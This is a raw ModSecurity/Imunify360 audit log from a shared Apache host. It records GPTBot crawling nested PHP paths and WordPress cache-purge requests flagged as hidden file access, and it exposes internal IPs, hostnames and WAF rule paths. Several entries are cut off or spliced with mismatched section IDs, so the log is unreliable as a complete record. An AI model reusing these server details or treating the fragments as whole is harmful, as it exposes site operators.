11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --2a456940-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=7388, p1=171, p2=6506, p3=678, p4=33, p5=0, sr=64, sw=0, l=0, gc=0||Py scan:12357||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751322363544393 24520 (- - -) Stopwatch2: 1751322363544393 24520; combined=7827, p1=171, p2=6506, p3=678, p4=33, p5=438, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2a456940-Z-- --c0056221-A-- [01/Jul/2025:03:56:04.314608 +0530] aGMO_HTj6hSpYek9K0DXMgAAAAk 20.171.207.232 35116 192.168.74.40 443 --c0056221-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/images/aainag/Rajasthan-Travel-Guides/Ajmer-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --c0056221-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323021952061 15555 (- - -) Stopwatch2: 1751323021952061 15555; combined=2776, p1=129, p2=2503, p3=0, p4=0, p5=144, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e4f6a84c-Z-- --9d9d9757-A-- [01/Jul/2025:04:07:02.395859 +0530] aGMRhzqs8dHr60NVOXF1xgAAAAU 103.185.74.40 41564 192.168.74.40 443 --9d9d9757-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --9d9d9757-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9d9d9757-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323015424738 6971719 (- - -) Stopwatch2: 1751323015424738 6971719; combined=2854, p1=131, p2=2519, p3=0, p4=0, p5=204, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --9d9d9757-Z-- --6a4ba36e-A-- [01/Jul/2025:04:07:02.427561 +0530] aGMRjPNTxKUticRHUJScBgAAAAM 103.185.74.40 61934 192.168.74.40 443 --6a4ba36e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --6a4ba36e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6a4ba36e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323020426810 2001174 (- - -) Stopwatch2: 1751323020426810 2001174; combined=2144, p1=85, p2=1911, p3=0, p4=0, p5=147, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6a4ba36e-Z-- --7d4f5837-A-- [01/Jul/2025:04:07:03.126440 +0530] aGMRj-sj-2FaVuRVHmG9-gAAABs 20.171.207.232 45198 192.168.74.40 443 --7d4f5837-B-- GET /rajasthan-tours-from-udaipur/aainag/aainag/images/Rajasthan-Travel-Guides/https/js/https/js/photo-gallery.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --7d4f5837-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323185086172 1394186 (- - -) Stopwatch2: 1751323185086172 1394186; combined=3761, p1=95, p2=3360, p3=105, p4=10, p5=190, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3ef5024d-Z-- --926e9a50-A-- [01/Jul/2025:04:09:47.139530 +0530] aGMSMUPDmYBEtrJSU1qAigAAAAM 103.185.74.40 47864 192.168.74.40 443 --926e9a50-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --926e9a50-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --926e9a50-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323185706578 1433714 (- - -) Stopwatch2: 1751323185706578 1433714; combined=2394, p1=127, p2=2073, p3=0, p4=0, p5=194, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --926e9a50-Z-- --d5b9c119-A-- [01/Jul/2025:04:09:47.177941 +0530] aGMSM1liqPByo-SXMIqN8QAAAAA 20.171.207.232 34062 192.168.74.40 443 --d5b9c119-B-- GET /https/aainag/images/testimonials/https/js/rajasthan-tours-from-delhi/aainag/Rajasthan-Travel-Guides/Kota-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d5b9c119-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323187152976 25024 (- - -) Stopwatch2: 1751323187152976 25024; combined=4300, p1=167, p2=3978, p3=0, p4=0, p5=154, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d5b9c119-Z-- --f498b060-A-- [01/Jul/2025:04:09:48.311112 +0530] aGMSM0XOGC-i2apywaVPAAAAAAE 103.185.74.40 52201 192.168.74.40 443 --f498b060-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --f498b060-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f498b060-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323187352183 959406 (- - -) Stopwatch2: 1751323187352183 959406; combined=2496, p1=124, p2=2232, p3=0, p4=0, p5=140, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f498b060-Z-- --14ac9826-A-- [01/Jul/2025:04:09:48.353327 +0530] aGMSNFliqPByo-SXMIqN8gAAAAA 20.171.207.232 34062 192.168.74.40 443 --14ac9826-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/aainag/js/js/Rajasthan-Travel-Guides/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --14ac9826-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323194168126 15698 (- - -) Stopwatch2: 1751323194168126 15698; combined=3422, p1=132, p2=3114, p3=0, p4=0, p5=175, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a20e7b3a-Z-- --5b9a2f4f-A-- [01/Jul/2025:04:09:54.527986 +0530] aGMSOfhJyMbl8DbCJOrA6gAAAB4 103.185.74.40 21991 192.168.74.40 443 --5b9a2f4f-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/plugins_loaded Accept: */* Accept-Encoding: deflate, gzip Connection: close --5b9a2f4f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5b9a2f4f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323193468452 1060213 (- - -) Stopwatch2: 1751323193468452 1060213; combined=2217, p1=84, p2=1943, p3=0, p4=0, p5=190, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5b9a2f4f-Z-- --1a4cbf2b-A-- [01/Jul/2025:04:09:55.811588 +0530] aGMSOkXOGC-i2apywaVPAwAAAAE 103.185.74.40 47019 192.168.74.40 443 --1a4cbf2b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/plugins_loaded Accept: */* Accept-Encoding: deflate, gzip Connection: close --1a4cbf2b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1a4cbf2b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323194741573 1070911 (- - -) Stopwatch2: 1751323194741573 1070911; combined=3814, p1=128, p2=3522, p3=0, p4=0, p5=163, sr=111, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1a4cbf2b-Z-- --6b0c5479-A-- [01/Jul/2025:04:09:56.527560 +0530] aGMSPFliqPByo-SXMIqN-QAAAAA 20.171.207.232 34062 192.168.74.40 443 --6b0c5479-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/Rajasthan-Travel-Guides/aainag/Car-Rentals-Ahmedabad.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --6b0c5479-F-- -- Apache-Handler: proxy-server Stopwatch: 1751323198892416 346711 (- - -) Stopwatch2: 1751323198892416 346711; combined=267, p1=90, p2=0, p3=0, p4=0, p5=177, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --5b9a2f4f-Z-- --99739251-A-- [01/Jul/2025:04:09:59.358828 +0530] aGMSPNH7CP685tBbyXhjDgAAAA0 103.185.74.40 17451 192.168.74.40 443 --99739251-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --99739251-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --99739251-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323196890223 2469338 (- - -) Stopwatch2: 1751323196890223 2469338; combined=3726, p1=220, p2=3289, p3=0, p4=0, p5=217, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --99739251-Z-- --cae4837d-A-- [01/Jul/2025:04:10:00.098677 +0530] aGMSQFliqPByo-SXMIqN_AAAAAA 20.171.207.232 34062 192.168.74.40 443 --cae4837d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/js/Rajasthan-Travel-Guides/Madhya_Pradesh-Destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --cae4837d-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323201228929 71814 (- - -) Stopwatch2: 1751323201228929 71814; combined=4548, p1=167, p2=4150, p3=0, p4=0, p5=230, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c0f76448-Z-- --f5347a75-A-- [01/Jul/2025:04:10:01.771301 +0530] aGMSP4lV4jxs_9sxswO4BwAAAAc 103.185.74.40 45226 192.168.74.40 443 --f5347a75-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --f5347a75-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f5347a75-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323199572138 2201829 (- - -) Stopwatch2: 1751323199572138 2201829; combined=2529, p1=86, p2=2187, p3=0, p4=0, p5=255, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f5347a75-Z-- --d806415e-A-- [01/Jul/2025:04:10:01.977275 +0530] aGMSQfhJyMbl8DbCJOrA7QAAAB4 124.156.225.181 44748 192.168.74.40 80 --d806415e-B-- GET / HTTP/1.1 Host: pakhi-infosoul.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323479762546 13983 (- - -) Stopwatch2: 1751323479762546 13983; combined=2614, p1=148, p2=2288, p3=0, p4=0, p5=178, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --0bc32725-Z-- --809ee109-A-- [01/Jul/2025:04:14:40.311892 +0530] aGMTVjPWr48hgLvWoS3jigAAABE 103.185.74.40 60384 192.168.74.40 443 --809ee109-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --809ee109-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --809ee109-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323478971868 1340330 (- - -) Stopwatch2: 1751323478971868 1340330; combined=2164, p1=83, p2=1895, p3=0, p4=0, p5=186, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --809ee109-Z-- --3bf8cc32-A-- [01/Jul/2025:04:14:41.048034 +0530] aGMTWce2CGXo-t6nHaRBNAAAACE 20.171.207.232 48914 192.168.74.40 443 --3bf8cc32-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-delhi/images/images/js/Rajasthan-Travel-Guides/Agra-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3bf8cc32-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3bf8cc32-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323481531177 7891 (- - -) Stopwatch2: 1751323481531177 7891; combined=4990, p1=122, p2=4610, p3=104, p4=3, p5=151, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1f7c823c-Z-- --3d0d5e2d-A-- [01/Jul/2025:04:14:41.721412 +0530] aGMTWP_tNdjORTJYkaY51gAAAAk 103.185.74.40 58179 192.168.74.40 443 --3d0d5e2d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --3d0d5e2d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3d0d5e2d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323480523054 1198827 (- - -) Stopwatch2: 1751323480523054 1198827; combined=2086, p1=62, p2=1875, p3=0, p4=0, p5=149, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3d0d5e2d-Z-- --89302245-A-- [01/Jul/2025:04:14:42.158899 +0530] aGMTWse2CGXo-t6nHaRBNQAAACE 20.171.207.232 48914 192.168.74.40 443 --89302245-B-- GET /https/js/rajasthan-tours-from-udaipur/images/aainag/Rajasthan-Travel-Guides/https/aainag/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --89302245-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --89302245-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323967289859 3534387 (- - -) Stopwatch2: 1751323967289859 3534387; combined=6328, p1=117, p2=5476, p3=276, p4=5, p5=364, sr=140, sw=90, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --cd78d215-Z-- --0b5b1f00-A-- [01/Jul/2025:04:22:51.616401 +0530] aGMVQf9EZv1_DBVMumTd6AAAAA0 103.185.74.40 8560 192.168.74.40 443 --0b5b1f00-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --0b5b1f00-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0b5b1f00-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323969971200 1645630 (- - 